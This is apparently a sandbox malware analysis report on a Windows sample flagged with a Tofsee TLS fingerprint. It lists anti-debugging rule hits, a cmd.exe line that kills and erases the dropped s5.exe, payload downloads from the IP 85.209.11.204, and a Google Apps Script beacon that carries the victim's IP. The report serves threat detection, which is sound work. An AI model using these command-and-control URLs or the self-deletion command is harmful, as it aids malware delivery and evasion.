Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Nov. 6, 2023, 9:30 a.m. | Nov. 6, 2023, 9:37 a.m. |
-
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "s5.exe" /f & erase "C:\Users\test22\AppData\Local\Temp\s5.exe" & exit
2600-
taskkill.exe taskkill /im "s5.exe" /f
2668
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
script.googleusercontent.com | 142.250.206.225 | |
script.google.com | 142.250.206.238 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49170 -> 172.217.24.78:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49171 -> 142.251.220.33:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49170 172.217.24.78:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.google.com | fd:ee:45:21:a2:3c:95:82:9b:ba:3f:7a:59:3c:f6:c2:7b:c7:84:8f |
TLSv1 192.168.56.103:49171 142.251.220.33:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.googleusercontent.com | cb:bb:d8:fc:60:aa:94:8f:47:5c:88:bb:c3:30:22:92:26:d3:85:2f |
pdb_path | C:\hoxi\hobokepeteye46\kum9\cagotihit4-pow.pdb |
resource name | AFX_DIALOG_LAYOUT |
resource name | None |
suspicious_features | Connection to IP address | suspicious_request | GET http://85.209.11.204/ip.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://85.209.11.204/api/files/client/s51 | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://85.209.11.204/api/files/client/s52 | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://85.209.11.204/api/files/client/s53 | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://85.209.11.204/api/files/client/s54 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://script.google.com/macros/s/AKfycbzq1CWyl36rt9O8a0Zlm5Z6LRB2igbns3CkTay10UBerGZv4zl389I1MOMTE8g-CKY/exec?xfgnxfgn&stream=5&ip=175.208.134.152&slots=0000¶m=empty | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://script.google.com/macros/s/AKfycbzq1CWyl36rt9O8a0Zlm5Z6LRB2igbns3CkTay10UBerGZv4zl389I1MOMTE8g-CKY/exec?xfgnxfgn&stream=5&ip=175.208.134.152&slots=0000¶m=empty | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://script.googleusercontent.com/macros/echo?user_content_key=rq3I6Pvq31ESr42SRVFCcH8cBMrOvGfc9LjrAFAjXKqooXQVZnHoVSKZ49ywNUr7mn_h-t_4xp16ZbQUh0u7vYizKKleUSwSOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa0CRDStSlAiWe9EsIf9E4ZPsnymwtpgwALY3ZEKNbUPKTwCm-q5YBdK9ax9ulRNROyEZlBVHKdgUzc9XRB8G-pFIaTITfR7fJ9yLw_QwlOLh3sVTfjuTogDzV_l7Cl_ErHbadLHwSTw0RLfCUlcjW3aqDyDBdoyuR54_mWWztr2JN0ZmedBznvo&lib=MGiFI8QOoThWusP0Kv6sJRfccXc-Ar0ZC |
request | GET http://85.209.11.204/ip.php |
request | GET http://85.209.11.204/api/files/client/s51 |
request | GET http://85.209.11.204/api/files/client/s52 |
request | GET http://85.209.11.204/api/files/client/s53 |
request | GET http://85.209.11.204/api/files/client/s54 |
request | GET http://script.google.com/macros/s/AKfycbzq1CWyl36rt9O8a0Zlm5Z6LRB2igbns3CkTay10UBerGZv4zl389I1MOMTE8g-CKY/exec?xfgnxfgn&stream=5&ip=175.208.134.152&slots=0000¶m=empty |
request | GET https://script.google.com/macros/s/AKfycbzq1CWyl36rt9O8a0Zlm5Z6LRB2igbns3CkTay10UBerGZv4zl389I1MOMTE8g-CKY/exec?xfgnxfgn&stream=5&ip=175.208.134.152&slots=0000¶m=empty |
request | GET https://script.googleusercontent.com/macros/echo?user_content_key=rq3I6Pvq31ESr42SRVFCcH8cBMrOvGfc9LjrAFAjXKqooXQVZnHoVSKZ49ywNUr7mn_h-t_4xp16ZbQUh0u7vYizKKleUSwSOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa0CRDStSlAiWe9EsIf9E4ZPsnymwtpgwALY3ZEKNbUPKTwCm-q5YBdK9ax9ulRNROyEZlBVHKdgUzc9XRB8G-pFIaTITfR7fJ9yLw_QwlOLh3sVTfjuTogDzV_l7Cl_ErHbadLHwSTw0RLfCUlcjW3aqDyDBdoyuR54_mWWztr2JN0ZmedBznvo&lib=MGiFI8QOoThWusP0Kv6sJRfccXc-Ar0ZC |
cmdline | C:\Windows\System32\cmd.exe /c taskkill /im "s5.exe" /f & erase "C:\Users\test22\AppData\Local\Temp\s5.exe" & exit |
cmdline | "C:\Windows\System32\cmd.exe" /c taskkill /im "s5.exe" /f & erase "C:\Users\test22\AppData\Local\Temp\s5.exe" & exit |
file | C:\Users\test22\AppData\Local\Temp\s5.exe |
file | C:\Users\test22\AppData\Local\Temp\s5.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "s5.exe") |
section | {u'size_of_data': u'0x00038c00', u'virtual_address': u'0x00001000', u'entropy': 7.711129839146155, u'name': u'.text', u'virtual_size': u'0x00038b66'} | entropy | 7.71112983915 | description | A section with a high entropy has been found | |||||||||
entropy | 0.711598746082 | description | Overall entropy of this PE file is high |
url | https://api.ipify.org |
url | https://api.my-ip.io |
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API |
cmdline | C:\Windows\System32\cmd.exe /c taskkill /im "s5.exe" /f & erase "C:\Users\test22\AppData\Local\Temp\s5.exe" & exit |
cmdline | "C:\Windows\System32\cmd.exe" /c taskkill /im "s5.exe" /f & erase "C:\Users\test22\AppData\Local\Temp\s5.exe" & exit |
cmdline | taskkill /im "s5.exe" /f |
host | 85.209.11.204 |